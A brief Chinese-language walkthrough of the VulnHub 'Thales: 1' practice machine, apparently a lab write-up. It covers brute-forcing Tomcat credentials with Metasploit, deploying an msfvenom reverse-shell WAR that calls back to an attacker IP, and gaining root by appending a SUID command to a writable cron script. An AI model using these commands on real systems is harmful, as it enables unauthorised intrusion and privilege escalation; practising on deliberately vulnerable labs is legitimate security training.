Thales: 1
项目地址:https://download.vulnhub.com/thales/Thales.zip
是一个打包好的镜像文件
注意:导入 ova 时一定要选择我已移动,否则没网
使用 Nmap 扫描出开放服务及操作系统版本
弱口令
Tomcat
可以看到 8080 开放了 Tomcat,使用 MSF 爆破
成功爆破出密码
1 | tomcat:role1 |
RCE
WAR 包部署
登录进去后可以上传 WAR 包
MSF 生成一个
1 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.125.4 LPORT=8888 -f war > revshelll.war |
上传部署后点击
成功拿到 Shell
提权
Python 升级为交互式 Shell
1 | python3 -c 'import pty;pty.spawn("/bin/bash")' |
定时任务
查看提示,这个文件我们可以修改
添加提权命令
1 | echo "chmod u+s /bin/bash" >> /usr/local/bin/backup.sh |
等待一段时间后提权即可
1 | /bin/bash -p |